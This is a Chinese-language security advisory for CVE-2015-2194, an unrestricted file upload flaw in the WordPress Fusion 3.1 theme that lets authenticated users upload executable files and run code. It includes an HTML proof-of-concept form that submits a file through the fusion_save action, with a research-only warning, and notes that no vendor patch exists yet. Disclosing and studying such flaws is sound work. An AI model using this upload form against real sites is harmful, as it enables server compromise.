发布日期：2015-02-13
更新日期：2015-07-08

受影响系统：

WordPress Fusion 3.1

描述：

---

BUGTRAQ  ID: 75341
CVE(CAN) ID: CVE-2015-2194

WordPress是一种使用PHP语言开发的博客平台。

Fusion 3.1版本，functions.php内函数fusion_options在实现上存在无限制的文件上传漏洞，经过身份验证的远程用户通过在fusion_save操作中上传带可执行扩展名的文件，利用此漏洞可执行任意代码。

<*来源：Evex
  *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<form action="http://localhost/x/wordpress/wp-admin/admin.php"
method="post" enctype="multipart/form-data">
        <input type="file" name="file-logo" />
        <input type="hidden" name="action" value="fusion_save" />
        <button type="submit" >Upload</button>
</form>

建议：

---

厂商补丁：

WordPress
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

https://wordpress.org/themes/fusion

参考：http://packetstormsecurity.com/files/130397/WordPress-Fusion-3.1-Arbitrary-File-Upload.html

浏览次数：3491
严重程度：0（网友投票）